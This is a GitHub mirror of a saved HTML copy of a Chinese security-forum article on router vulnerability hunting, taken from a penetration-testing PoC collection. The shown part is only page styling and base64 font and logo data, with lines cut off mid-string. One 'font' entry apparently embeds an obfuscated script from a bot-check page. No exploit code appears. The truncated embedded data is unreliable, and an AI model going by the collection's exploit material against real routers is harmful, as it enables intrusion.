mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-11-07 11:44:47 +00:00
726 lines
2.6 MiB
HTML
726 lines
2.6 MiB
HTML
|
<!DOCTYPE html> <html data-arp style><!--
|
|||
|
|
Page saved with SingleFile
|
|||
|
|
url: https://forum.butian.net/share/4067
|
|||
|
|
--><meta charset=utf-8>
|
|||
|
|
<meta http-equiv=X-UA-Compatible content="IE=edge">
|
|||
|
|
<meta name=viewport content="width=device-width, initial-scale=1">
|
|||
|
|
<meta name=csrf-token content=0i1mEbtC7AnEYYE9vuiFS5zOB12DoxuskNKLfSlE>
|
|||
|
|
<title>从零开始的路由器漏洞挖掘之旅</title>
|
|||
|
|
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
|
|||
|
|
<meta name=description content=奇安信攻防社区-从零开始的路由器漏洞挖掘之旅>
|
|||
|
|
<meta name=author content="QIANXIN Team">
|
|||
|
|
<meta name=copyright content="2021 QIANXIN.com">
|
|||
|
|
<style>@media (max-width:767px){}</style>
|
|||
|
|
<style>/*!
|
|||
|
|
* Bootstrap v3.4.1 (https://getbootstrap.com/)
|
|||
|
|
* Copyright 2011-2019 Twitter, Inc.
|
|||
|
|
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|
|||
|
|
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}img{border:0}svg:not(:root){overflow:hidden}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@font-face{font-family:"Glyphicons Halflings";src:url(data:font/woff2;base64,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
|
|||
|
|
<style>/*!
|
|||
|
|
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
|
|||
|
|
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
|
|||
|
|
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
|
|||
|
|
<style>@media (min-width:1200px){.navbar-form{width:235px}}@media (min-width:768px){.navbar-form .form-control{width:100%}}@media (max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media (max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}blockquote{font-size:13px}pre{white-space:pre-wrap}@media (min-width:768px){}@media (min-width:992px){}@media (min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-20{margin-top:20px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:url(data:image/svg+xml;base64,PHN2ZyBpZD0i5Zu+5bGCXzEiIGRhdGEtbmFtZT0i5Zu+5bGCIDEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMCAwIDQyNi4xMyAxMTEuNDIiPjxkZWZzPjxzdHlsZT4uY2xzLTF7ZmlsbDojZmZmO308L3N0eWxlPjwvZGVmcz48dGl0bGU+5aWH5a6J5L+h5pS76Ziy56S+5Yy6X2xvZ288L3RpdGxlPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTExMiw1Ny4zM3YtNGgzNy43OHY0aC00LjM5VjcxLjE4cS4wOCw1LjUzLTUuMTksNS40NGgtNC44OXYtNGgyLjM0YzEuMiwwLDEuNzgtLjYyLDEuNzUtMS45M1Y1Ny4zM1ptMS44LTExLjkydi00aDEzLjg1VjM4LjkzaDYuNDh2Mi41MWgxMy45M3Y0SDEzNi4zNXEzLDIuNTEsMTAuOTIsNC4zMXYzLjQ3UTEzNiw1MS42NSwxMzAuODcsNDcuNXEtNS4xLDQuMTQtMTYuMzYsNS42OVY0OS43MmM1LjI1LTEuMiw4Ljg4LTIuNjQsMTAuOTItNC4zMVptMi4wOSwyNy4yOFY1OS43NmgxOS4zN3Y3LjM2Yy4xMSwzLjgzLTEuNjcsNS42OC01LjM1LDUuNTdabTUuNDgtNGg2LjQ1YzEuMzkuMDksMi4wNS0uNjEsMi0yLjA5VjYzLjc4aC04LjQxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE1My42Nyw1OC43MlY1NC41M2g0LjY5VjUwLjMxaDYuNTJ2NC4yMmgxNS42OVY1MC4zMWg2LjUzdjQuMjJoNC44MXY0LjE5aC01LjA2YTE1LjM2LDE1LjM2LDAsMCwxLTcuNTcsMTEuODgsOTIuNiw5Mi42LDAsMCwwLDEyLjIxLDIuMzR2NHEtMTIuMTMtMS4yNS0xOC43OC0zLjQ3LTYuNTcsMi4yMi0xOC43LDMuNDd2LTRhMTA0LDEwNCwwLDAsMCwxMi4xNy0yLjM0LDE1LjA2LDE1LjA2LDAsMCwxLTcuNTctMTEuODhabTM2LjYxLTE2Ljg2djcuMzZoLTYuMTVWNDZIMTYxLjM3djMuMjJoLTYuMTVWNDEuODZoMTMuODlWMzkuMDloNy4ydjIuNzdaTTE3Mi43NSw2OC4yMXE2LjY5LTMuMTgsNy42MS05LjQ5SDE2NS4wOVExNjUuOTMsNjUsMTcyLjc1LDY4LjIxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE5OSw3N1Y1Mi43M2EyNywyNywwLDAsMS0zLjQ3LDEuNDNWNTAuMzVhMTcuMiwxNy4yLDAsMCwwLDUuOS0xMWg1LjlhMzIuODYsMzIuODYsMCwwLDEtMi42OCw3LjdWNzdabTcuNzQtMzF2LTRoMTBWMzkuM2g2Ljd2Mi43NmgxMC4xMnY0Wm0xLjM0LDMwLjVWNjIuMjNIMjMxLjd2Ny43cS4xNyw2LjgxLTYuMTUsNi42MVptLjEzLTI0di0zLjhoMjMuNDJ2My44Wm0wLDYuN1Y1NS40MWgyMy40MnYzLjgxWm0xNy44NiwxMC42MlY2Ni4ySDIxMy43MXY2LjMyaDEwLjEyQzIyNS4zOSw3Mi42MywyMjYuMTMsNzEuNzQsMjI2LjA1LDY5Ljg0WiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTIzNy43Niw0Ni40NnYtNGgxNC40OHY0SDI0OFY2NS4yNGMxLjQyLS4zLDMtLjcxLDQuNzMtMS4yMXY0LjE0YTU1LjQxLDU1LjQxLDAsMCwxLTE1LjE0LDMuNzdWNjYuNzljMS4yNS0uMDgsMi43OC0uMjQsNC42LS40NlY0Ni40NlptMTMuNDMsOC4wN1Y1MC44MXE0LjY5LTQsNS40NC0xMS41NWg2LjExYTMyLjMxLDMyLjMxLDAsMCwxLTEuMDUsNC40NGgxMy43N3Y0aC0zcS0uODQsMTEuODUtNS44NiwxOC4yYTQzLjI2LDQzLjI2LDAsMCwwLDguNDksNi44MnY0LjQ0YTQ5LjQxLDQ5LjQxLDAsMCwxLTEyLTcuNTMsNTIuMTMsNTIuMTMsMCwwLDEtMTIuNjQsNy41N1Y3Mi44MUE0MC4wNyw0MC4wNywwLDAsMCwyNTkuNzMsNjZhMzQuMzgsMzQuMzgsMCwwLDEtNS42MS0xMi44QTIxLjc4LDIxLjc4LDAsMCwxLDI1MS4xOSw1NC41M1ptOC4yNS0zLjcyYTM2LjQsMzYuNCwwLDAsMCwzLjc2LDEwLjVxMi43MS00Ljg5LDMuNDMtMTMuNTZIMjU5LjlhMTUuMSwxNS4xLDAsMCwxLTIuNDcsMy4wNloiLz48cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Ik0yODAuNTYsNzYuOTFWNDAuNjRoMTMuNzN2NGEyNS44NiwyNS44NiwwLDAsMS0yLjY0LDEwLDExLjMyLDExLjMyLDAsMCwxLDMsNy40cS4xNyw4LjUzLTcuOTEsOC4zN1Y2NS45MWMyLDAsMy0xLjUsMy4wNi00Lj
|
|||
|
|
<style>a{color:#009a61;text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media (max-width:767px){}@media (max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#E7F2ED;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
|
|||
|
|
<style>@font-face{font-family:qax-design-icons;src:url(data:text/html;base64,PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBub25jZT0iNzExMWE3MTVlM2VjNDkwMWJjZDM0ZTcxY2UxIiBzcmM9Ii8vbG9jYWwuYWRndWFyZC5vcmc/dHM9MTczOTAxNjE1MzA5MCZhbXA7dHlwZT1jb250ZW50LXNjcmlwdCZhbXA7ZG1uPWZvcnVtLmJ1dGlhbi5uZXQmYW1wO3VybD1odHRwcyUzQSUyRiUyRmZvcnVtLmJ1dGlhbi5uZXQlMkZzdGF0aWMlMkZqcyUyRnFheGQlMkZmb250cyUyRnFheC1kZXNpZ24taWNvbnMud29mZiZhbXA7YXBwPWNvbS5nb29nbGUuQ2hyb21lJmFtcDtjc3M9MyZhbXA7anM9MSZhbXA7cmVsPTEmYW1wO3JqaT0xJmFtcDtzYmU9MSZhbXA7c3RlYWx0aD0xJmFtcDtzdC11YT1UVzk2YVd4c1lTODFMakFnS0UxaFkybHVkRzl6YURzZ1NXNTBaV3dnVFdGaklFOVRJRmdnTVRRdU1Ta2dRWEJ3YkdWWFpXSkxhWFF2TmpJd0xqSXdJQ2hMU0ZSTlRDd2diR2xyWlNCSFpXTnJieWtnVm1WeWMybHZiaTh4Tnk0MkxqUXpJRk5oWm1GeWFTODJNakF1TWpBPSZhbXA7c3QtY2gtYnJhbmRzPSZhbXA7c3QtY2gtbW9iaWxlPSZhbXA7c3QtY2gtcGxhdGZvcm09JmFtcDtzdC13cnRjJmFtcDtzdC1wdXNoJmFtcDtzdC1sb2MmYW1wO3N0LWphdmEmYW1wO3N0LXJlZj1hSFIwY0hNNkx5OW1iM0oxYlM1aWRYUnBZVzR1Ym1WMEx3PT0mYW1wO3N0LWRudCI+PC9zY3JpcHQ+PC9oZWFkPgoKPGJvZHk+CiAgICA8bm9zY3JpcHQ+CiAgICAgICAgPGgxPjxzdHJvbmc+UGxlYXNlIGVuYWJsZSBKYXZhU2NyaXB0IGFuZCByZWZyZXNoIHRoZSBwYWdlLjwvc3Ryb25nPjwvaDE+CiAgICA8L25vc2NyaXB0PgoKICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KICAgICAgICAoZnVuY3Rpb24obyxzKXtmdW5jdGlvbiBUKG8scyl7cmV0dXJuIHUoby0nMHgyNzcnLHMpO31mdW5jdGlvbiBrKG8scyl7cmV0dXJuIFIocy0gLScweDE4NScsbyk7fWZ1bmN0aW9uIG4obyxzKXtyZXR1cm4gUihzLScweDFlYScsbyk7fWZ1bmN0aW9uIGcobyxzKXtyZXR1cm4gdShzLSAtJzB4MTIwJyxvKTt9dmFyIHE9bygpO3doaWxlKCEhW10pe3RyeXt2YXIgRz0tcGFyc2VJbnQoZygnWDlQXicsJzB4Y2InKSkvKDB4YWY2KjB4MisweGVhYioweDErLTB4MjQ5NikqKC1wYXJzZUludChUKCcweDQ0MycsJ1gzUWEnKSkvKDB4MSotMHgxMTJiKzB4NSoweDNhZCstMHgxMzQpKStwYXJzZUludChnKCc5d2NPJywnMHg4ZScpKS8oLTB4ZjcqMHgxOCsweGUqMHhiKy0weDEqLTB4MTY5MSkqKHBhcnNlSW50KG4oJzB4MzMzJywnMHgzZDcnKSkvKDB4MyotMHg0OSsweDFhMDUrLTB4MTkyNikpKy1wYXJzZUludChuKCcweDNjNycsJzB4MzI5JykpLygtMHgxMCotMHgxOGUrLTB4ZGU3Ki0weDIrLTB4MzRhOSkqKC1wYXJzZUludChrKC0nMHgxMScsLScweDZhJykpLygweDIqLTB4MTBiMisweDgzKjB4MzYrMHgyNSoweDI4KSkrLXBhcnNlSW50KGcoJ0lGUXMnLCcweDEwMCcpKS8oMHhjZTErMHgxKi0weGU1NysweDE3ZCkrLXBhcnNlSW50KFQoJzB4M2NkJywnWUc0WCcpKS8oMHgxYjM4KzB4MTRmNyoweDErLTB4MzAyNykrcGFyc2VJbnQoVCgnMHg0NTMnLCcqcFlmJykpLygweDQzMSstMHgxZDZjKzB4MTk0NCkqKHBhcnNlSW50KGsoLScweDhiJywtJzB4NGYnKSkvKC0weDEyYTArLTB4ZDMqLTB4MWQrMHgxKi0weDUzZCkpKy1wYXJzZUludChuKCcweDQ2NicsJzB4NDE0JykpLygtMHgxMSoweDExNSstMHgxMzBkKjB4MSstMHgyNTdkKi0weDEpKihwYXJzZUludChrKCcweDEwJywnMHhkJykpLygtMHgxKi0weDIzODYrMHgxZmRkKy0weDQzNTcqMHgxKSk7aWYoRz09PXMpYnJlYWs7ZWxzZSBxWydwdXNoJ10ocVsnc2hpZnQnXSgpKTt9Y2F0Y2godil7cVsncHVzaCddKHFbJ3NoaWZ0J10oKSk7fX19KGIsLTB4YjgwN2ErMHgxZGMxYSsweDMqMHg3OGZhMykpO3ZhciBjPScvV1pXU1JFTDNOMFlYUnBZeTlxY3k5eFlYaGtMMlp2Ym5SekwzRmhlQzFrWlhOcFoyNHRhV052Ym5NdWQyOW1aZz09JyxGPScrMGlySltTd3knO2Z1bmN0aW9uIGIoKXt2YXIgb3E9WydXNk5kVVNvNW1Da3cnLCdXNVpkSXRGZEpTb3knLCdrY0JkTVdEcicsJ3lNTHV0ZzQnLCd6ZW5PQXdXJywnV1JiU1c2R1RCYScsJ0FTb29kd05kSmEnLCdXUlJkT0NveldRSzcnLCdmZ0ZkSm1rcmFxaGRSbW9EY1NrZHNmeGNIZGknLCdEZ3Y0RGdlJywndjFXOGVidScsJ1c2M2NSU2t3V090ZEhXJywnV09WY00xZGNIOG9UJywnQk05VXpxJywncEdSY0ltb2ZXNHEnLCd5dzFMJywnejhvQmUybGRHcScsJ3owamVBTnEnLCdtdHFZbVp1MG0zdlVBaGZmcUcnLCduU29ZVzdHQicsJ3pzS0dFMzAnLCdXNFpkVThrRHJhVycsJ1c0aVFXNTFybVcnLCdEZFJjUThvTVdQQycsJ3l3ck9xMDgnLCd6Q2tPV09xUnVhJywnRE12WUF3eScsJ3plSHBBdXUnLCdDTTl1cmZlJywnQ2dmWUMydScsJ21jMDV5czAnLCdDTnZKRGc4JywnQU1yandNRycsJ3FLNVJFd2knLCdtdGVabXRhWW1aenJCd3